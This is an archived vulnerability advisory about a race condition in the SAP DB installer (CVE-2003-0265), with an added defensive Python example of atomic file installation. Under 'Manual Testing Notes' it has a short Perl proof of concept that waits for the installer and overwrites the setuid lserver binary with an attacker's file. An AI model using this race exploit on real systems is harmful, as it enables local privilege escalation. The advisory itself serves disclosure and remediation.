SAP DB SDBINST Permission Race Condition Privilege Elevation

2003-04-27T00:00:00
ID OSVDB:11915
Type osvdb
Reporter Larry W. Cashdollar (lwc@vapid.dhs.org)
Modified 2003-04-27T00:00:00

Description

Vulnerability Description

SAP DB contains a flaw that may allow a malicious local user to overwrite the contents of files during installation. The issue is a race condition in the installer: several seconds pass between decompressing the files and setting the setuid bits. A malicious local user may be able to overwrite the contents of the files during that window, resulting in a loss of integrity.
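
For installer authors, the window described above can be closed by never letting the file exist under its final name before it has its final mode. The following is an added example, not SAP DB's installer code and not part of the advisory; the helper name and paths are hypothetical, and it assumes the window exists because unpacked files stay writable by other users until the installer sets their final mode.

```python
import os
import stat

def install_privileged(dest, payload, mode=0o4755):
    """Place payload at dest with its final mode, leaving no writable window.

    Hypothetical helper: the name, arguments and paths are assumptions.
    """
    dest = os.path.abspath(dest)
    dest_dir = os.path.dirname(dest)
    # A directory other users can write to lets them swap the file by name,
    # whatever the file's own mode is, so refuse to install there.
    if os.stat(dest_dir).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError(f"{dest_dir} is group- or world-writable")

    tmp = os.path.join(dest_dir, f".{os.path.basename(dest)}.{os.getpid()}.tmp")
    # O_EXCL: fail if the name already exists (no reuse of a planted file).
    # O_NOFOLLOW: do not follow a symlink planted at the temp name.
    # 0o600: owner-only from the moment the inode exists.
    fd = os.open(tmp, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(payload)
            f.flush()
            # Set the final mode on the descriptor we wrote through, not on a
            # path that could be re-pointed, and only after the last write.
            os.fchmod(f.fileno(), mode)
            os.fsync(f.fileno())
        # Atomic rename: the final name only ever refers to a complete file
        # that already carries its final permissions.
        os.replace(tmp, dest)
    except BaseException:
        os.unlink(tmp)
        raise
    return stat.S_IMODE(os.stat(dest).st_mode)
```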

Solution Description

Upgrade to version 7.4.03 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

#!/bin/perl
# Loop until PRECOM.ins appears in the installer's LIST* files.
while (1) {
    $test = `grep -sh PRECOM.ins /tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`;
    if ( $test =~ /PRECOM/ ) {
        # Copy a file over lserver, then stop.
        system("cp /home/lwc/run /usr/sapdb/depend/pgm/lserver");
        exit(1);
    }
}

References:

Vendor Specific Solution URL: http://www.sapdb.org/7.4/sap_db_downloads.htm
Other Advisory URL: http://www.securiteam.com/unixfocus/5AP0N209PY.html
ISS X-Force ID: 11881
Generic Informational URL: http://marc.theaimsgroup.com/?l=bugtraq&m=105232424810097&w=2
Generic Exploit URL: http://vapid.dhs.org/sap-db-install.txt
CVE-2003-0265
Bugtraq ID: 7421